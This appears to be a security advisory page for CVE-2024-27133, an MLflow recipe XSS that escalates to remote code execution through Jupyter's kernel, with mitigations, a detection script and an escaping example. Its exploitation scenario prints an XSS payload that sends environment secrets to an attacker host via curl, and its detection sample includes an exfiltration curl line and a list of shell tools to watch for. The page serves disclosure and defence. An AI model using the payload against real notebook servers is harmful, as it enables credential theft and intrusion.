CVE-2024-27133: MLflow: XSS in recipe runner enables Jupyter RCE
Severity: CRITICAL | Proof of concept: available | CISA SSVC: Track

MLflow's recipe pipeline renders dataset table fields without sanitization, allowing a crafted dataset to execute JavaScript in Jupyter Notebook and escalate to RCE on the data scientist's machine. Any team running MLflow recipes against external or third-party datasets is at risk; the attacker needs no credentials, only the ability to get a dataset in front of a user who runs a recipe on it in Jupyter. Apply the fix tracked in MLflow PR #10893 (see References) and audit all active recipe data source configurations.
What is the risk?
CVSS 9.6 Critical: network vector, low attack complexity and no privileges required, but the vector carries UI:R, so exploitation depends on a data scientist running a recipe over the attacker's dataset inside Jupyter; it is not triggerable at scale without that step. The Changed Scope (S:C) reflects the XSS breaking out of the MLflow rendering context into Jupyter's kernel execution environment, which is what lifts the impact to full C/I/A. Exposure is highest in organizations where data scientists run MLflow locally or in shared Jupyter environments that hold cloud credentials and model artifacts. The package table below records no patched version range; the fix is the change tracked in MLflow PR #10893, so confirm which MLflow release carries it before relying on a version pin, and assess exposure now.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| MLflow | pip | — | No patch |
Do you use MLflow recipes? If a recipe runs inside Jupyter against a dataset you do not fully control, you are affected.
What should I do?
Six steps:

1. PATCH: Apply the MLflow fix tracked in PR #10893. Pin to a release that carries it and block older versions via package policy.
2. DATA SOURCE CONTROLS: Allow only trusted, schema-validated datasets in MLflow recipes. Treat every external dataset, including its column names, as untrusted input.
3. JUPYTER HARDENING: Set a Content-Security-Policy through Jupyter Server's response-header configuration and confirm the notebook frontend still loads under it; run JupyterHub with isolated kernels per user and no shared kernel access.
4. NETWORK SEGMENTATION: Data science environments should not have broad lateral access to production systems or credential stores, and kernel egress should be limited to known destinations.
5. DETECTION: Monitor ipykernel processes on notebook hosts for unusual child processes (shells, curl, wget) or outbound connections to non-allowlisted destinations, correlated with recipe dataset-load events. Audit kernel execution logs.
6. CREDENTIALS: Rotate credentials reachable from data science workstations, such as cloud provider keys in environment variables, if the exposure window was open.
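One way to implement the detection step, as an added example that is neither MLflow's nor Jupyter's own tooling: it correlates process and network telemetry from a notebook host with recipe dataset-load events and flags a kernel that spawns a shell tool or reaches a non-allowlisted host shortly after loading data. The telemetry lines, field names, kernel pid, allowed address ranges and the five-minute window are all constructed assumptions for this example.

```python
"""Added example, not MLflow's or Jupyter's own tooling: correlates process and
network telemetry from a notebook host with MLflow recipe dataset-load events
to flag the post-exploitation pattern the advisory describes (a kernel that
spawns a shell tool or reaches an unknown host shortly after loading data)."""
import json
from datetime import datetime, timedelta

# Constructed telemetry lines. The field names are an assumption for this
# example; map them from whatever your EDR, auditd or eBPF pipeline emits.
# pid 4242 is the ipykernel process; 10.0.0.5 is an internal feature store;
# 203.0.113.10 and attacker.example are documentation-range placeholders.
SAMPLE_EVENTS = """\
{"ts":"2024-02-01T10:00:00Z","type":"dataset_load","pid":4242,"detail":"recipe step ingest: s3://bucket/third-party.parquet"}
{"ts":"2024-02-01T10:00:03Z","type":"network","pid":4242,"comm":"python","dst":"10.0.0.5:5432"}
{"ts":"2024-02-01T10:00:07Z","type":"process","pid":4300,"ppid":4242,"comm":"curl","args":"curl https://attacker.example/exfil"}
{"ts":"2024-02-01T10:00:08Z","type":"network","pid":4300,"comm":"curl","dst":"203.0.113.10:443"}
{"ts":"2024-02-01T11:30:00Z","type":"process","pid":4400,"ppid":4242,"comm":"git","args":"git status"}
"""

# Assumptions: kernel pids come from process telemetry (command lines containing
# ipykernel_launcher); internal address ranges are the only expected egress.
KERNEL_PIDS = {4242}
SUSPICIOUS_CHILDREN = {"sh", "bash", "zsh", "curl", "wget", "nc", "ncat", "perl"}
ALLOWED_DST_PREFIXES = ("10.", "192.168.")
WINDOW = timedelta(minutes=5)


def parse_events(text):
    """Parses one JSON event per line and sorts by timestamp."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    for e in events:
        e["ts"] = datetime.fromisoformat(e["ts"].replace("Z", "+00:00"))
    return sorted(events, key=lambda e: e["ts"])


def detect(events, kernel_pids=KERNEL_PIDS, window=WINDOW):
    """Returns (rule, ts, detail) alerts for kernel activity within `window`
    after that kernel's most recent dataset load. Children of a kernel inherit
    attribution so their network activity is covered too."""
    alerts = []
    last_load = {}   # kernel pid -> timestamp of its latest dataset load
    child_of = {}    # descendant pid -> kernel pid
    for e in events:
        pid = e["pid"]
        if e["type"] == "dataset_load":
            if pid in kernel_pids:
                last_load[pid] = e["ts"]
            continue
        if pid in kernel_pids:
            kernel = pid
        elif e.get("ppid") in kernel_pids:
            kernel = e["ppid"]
        else:
            kernel = child_of.get(pid, child_of.get(e.get("ppid")))
        if kernel is None:
            continue
        if e["type"] == "process":
            child_of[pid] = kernel
        loaded_at = last_load.get(kernel)
        if loaded_at is None or not (timedelta(0) <= e["ts"] - loaded_at <= window):
            continue  # outside the post-load window (the git event above)
        if e["type"] == "process" and e["comm"] in SUSPICIOUS_CHILDREN:
            alerts.append(("kernel_spawned_shell_tool", e["ts"], e["args"]))
        elif e["type"] == "network" and not e["dst"].startswith(ALLOWED_DST_PREFIXES):
            alerts.append(("kernel_external_connection", e["ts"], e["dst"]))
    return alerts


if __name__ == "__main__":
    for rule, ts, detail in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{ts.isoformat()} {rule}: {detail}")
```

On the sample, the curl spawned seven seconds after the ingest step and its connection to 203.0.113.10 both alert, while the kernel's own connection to the internal feature store and the `git status` ninety minutes later do not. The time window is what keeps the rule quiet on ordinary notebook use; widen it, or drop it for shells, if your kernels rarely spawn child processes at all.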
What does CISA's SSVC say?
CISA Vulnrichment decision: Track (SSVC v2.0, CISA Coordinator decision tree).
Frequently Asked Questions
What is CVE-2024-27133?
A cross-site scripting flaw in MLflow's recipe pipeline: dataset table fields are rendered without sanitization, so a crafted dataset can run JavaScript in Jupyter Notebook and, from there, Python in the kernel, giving RCE on the data scientist's machine. Teams running MLflow recipes against external or third-party datasets are at risk, and the attacker needs no credentials. Apply the fix tracked in MLflow PR #10893 and audit active recipe data source configurations.
Is CVE-2024-27133 actively exploited?
This page records no evidence of exploitation in the wild (CISA SSVC decision: Track; EPSS 0.65%), but proof-of-concept exploit code is publicly available for CVE-2024-27133, which raises the likelihood.
How to fix CVE-2024-27133?
1. PATCH: Apply the MLflow fix tracked in PR #10893 and pin to a release that carries it. 2. DATA SOURCE CONTROLS: Allow only trusted, schema-validated datasets in recipes and treat external datasets as untrusted. 3. JUPYTER HARDENING: Content-Security-Policy headers and JupyterHub with isolated kernels per user. 4. NETWORK SEGMENTATION: Keep data science environments away from production systems and credential stores. 5. DETECTION: Watch kernel processes for unusual subprocesses and outbound connections after dataset loads. 6. CREDENTIALS: Rotate credentials reachable from affected workstations. The six steps under "What should I do?" above give the detail.
What systems are affected by CVE-2024-27133?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, ML experiment tracking, data science notebooks, MLOps platforms.
What is the CVSS score for CVE-2024-27133?
CVE-2024-27133 has a CVSS v3.1 base score of 9.6 (CRITICAL). Its EPSS score is 0.65%, the estimated probability of exploitation activity in the next 30 days.
What is the AI security impact?
Affected AI Architectures
Training pipelines, ML experiment tracking, data science notebooks, MLOps platforms.
MITRE ATLAS Techniques
- AML.T0002.000 Datasets
- AML.T0010.002 Data
- AML.T0011 User Execution
- AML.T0049 Exploit Public-Facing Application
- AML.T0050 Command and Scripting Interpreter
What are the technical details?
Original Advisory
Insufficient sanitization in MLflow leads to XSS when running a recipe that uses an untrusted dataset. This issue leads to a client-side RCE when running the recipe in Jupyter Notebook. The vulnerability stems from lack of sanitization over dataset table fields.
Exploitation Scenario
An adversary with the ability to influence a dataset, via a compromised data pipeline, a malicious public dataset, or a supply chain attack on a data vendor, injects an XSS payload into a column header or cell value, for example:

```html
<img src=x onerror="fetch('/api/kernels/KERNEL_ID/execute',{method:'POST',body:JSON.stringify({code:'import subprocess;subprocess.run(["curl","https://attacker.com/exfil?h="+open("/proc/1/environ").read()])'})})">
```

When a data scientist runs an MLflow recipe referencing this dataset inside Jupyter Notebook, MLflow renders the dataset table without HTML encoding. The payload executes in the notebook's browser context, same origin as the Jupyter server, reaches the kernel API, and injects arbitrary Python into the running kernel. The attacker achieves RCE on the data scientist's machine with few visible indicators in the notebook, gaining access to ML model weights, training data, and cloud provider credentials held in environment variables.

The snippet is a sketch of the technique rather than a working payload: Jupyter Server delivers execute requests to a kernel over the WebSocket at /api/kernels/<id>/channels rather than a REST POST, its REST endpoints expect an XSRF token, and the nested double quotes would need escaping inside the attribute. None of that stops a same-origin script, which can read the _xsrf cookie and open the WebSocket itself; the point is that any script running on the Jupyter origin can drive the kernel.
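The rendering bug and two of the controls from the steps above (schema-validated datasets, context-aware output encoding from the CWE-79 mitigations below), as an added example that is not MLflow's code: a minimal dataset-to-HTML renderer in the vulnerable shape the advisory describes, its hardened form, a parser-based check that shows which output still carries active markup, and a pre-render schema check that rejects a dataset before it reaches the renderer. The poisoned and clean datasets, the expected column names and the character class are constructed assumptions.

```python
"""Added example, not MLflow's code: a minimal dataset-to-HTML renderer in the
vulnerable shape CVE-2024-27133 describes, its hardened form, and a pre-render
schema check for the "treat external datasets as untrusted" control."""
import html
import re
from html.parser import HTMLParser

# Constructed poisoned dataset: a column header and a cell carry markup of the
# kind the advisory describes. Payloads are deliberately inert (alert only).
POISONED_DATASET = {
    "columns": ["id", '<img src=x onerror="alert(1)">'],
    "rows": [[1, "benign"], [2, "<script>alert(1)</script>"]],
}
CLEAN_DATASET = {"columns": ["id", "label"], "rows": [[1, "cat"], [2, "dog"]]}


def _table(header_cells, body_rows):
    head = "".join(f"<th>{c}</th>" for c in header_cells)
    body = "".join("<tr>" + "".join(f"<td>{v}</td>" for v in row) + "</tr>" for row in body_rows)
    return f"<table><thead><tr>{head}</tr></thead><tbody>{body}</tbody></table>"


def render_table_vulnerable(dataset):
    """CWE-79: header and cell text is interpolated into HTML unchanged."""
    return _table(dataset["columns"], dataset["rows"])


def render_table_hardened(dataset):
    """HTML-entity-encodes every header and cell for the HTML-body context.
    quote=True also encodes quotes, so the values stay inert if a caller later
    places them in a double- or single-quoted attribute value."""
    def esc(value):
        return html.escape(str(value), quote=True)
    return _table([esc(c) for c in dataset["columns"]],
                  [[esc(v) for v in row] for row in dataset["rows"]])


class _ActiveContentFinder(HTMLParser):
    """Records any tag outside the table skeleton, and any on* event-handler
    attribute, that the browser would actually parse from the rendered HTML."""
    SKELETON = {"table", "thead", "tbody", "tr", "th", "td"}

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.SKELETON:
            self.hits.append(tag)
        self.hits.extend(f"{tag}@{name}" for name, _ in attrs if name.startswith("on"))


def active_content(rendered):
    """Returns the active markup found in rendered HTML ([] if none)."""
    finder = _ActiveContentFinder()
    finder.feed(rendered)
    return finder.hits


# Assumed schema for the data-source control: exact column names, and string
# cells limited to a conservative character class (no < > " ' & ( ) etc.).
EXPECTED_COLUMNS = ["id", "label"]
SAFE_TEXT = re.compile(r"^[\w .,:/@+-]*$")


def validate_dataset(dataset, expected_columns=EXPECTED_COLUMNS):
    """Returns findings for a dataset that should not reach the renderer;
    an empty list means it passed the schema and content check."""
    findings = []
    if dataset["columns"] != expected_columns:
        findings.append(f"unexpected columns: {dataset['columns']!r}")
    for r, row in enumerate(dataset["rows"]):
        for c, value in enumerate(row):
            if isinstance(value, str) and not SAFE_TEXT.match(value):
                findings.append(f"row {r} col {c}: non-schema characters in {value!r}")
    return findings


if __name__ == "__main__":
    print("vulnerable:", active_content(render_table_vulnerable(POISONED_DATASET)))
    print("hardened:  ", active_content(render_table_hardened(POISONED_DATASET)))
    print("findings:  ", validate_dataset(POISONED_DATASET))
```

The vulnerable renderer emits an `img` tag with an `onerror` handler and a `script` tag straight from the dataset; the hardened one emits the same strings as entities, which the parser (like a browser) sees as text. The schema check is the belt to that suspenders: it rejects the poisoned dataset for both its unexpected column name and its non-schema cell content before anything is rendered, which is the right place to stop a third-party dataset in a recipe that also feeds the data into training.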
Weaknesses (CWE)
CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
- [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the HTML body, element attributes (such as src="XYZ"), URIs, JavaScript sections, Cascading Style Sheets and style properties, etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
References
- github.com/mlflow/mlflow/pull/10893 (issue, patch)
- research.jfrog.com/vulnerabilities/mlflow-untrusted-dataset-xss-jfsa-2024-000631932/ (exploit, third party)
- github.com/fkie-cad/nvd-json-data-feeds (exploit)
Related Vulnerabilities
- CVE-2025-15379 (10.0) MLflow: RCE via unsanitized model dependency specs (same package: mlflow)
- CVE-2023-3765 (10.0) MLflow: path traversal allows arbitrary file read (same package: mlflow)
- CVE-2026-2635 (9.8) mlflow: security flaw enables exploitation (same package: mlflow)
- CVE-2023-1177 (9.8) MLflow: path traversal allows arbitrary file read/write (same package: mlflow)
- CVE-2023-2780 (9.8) MLflow: path traversal allows arbitrary file read/write (same package: mlflow)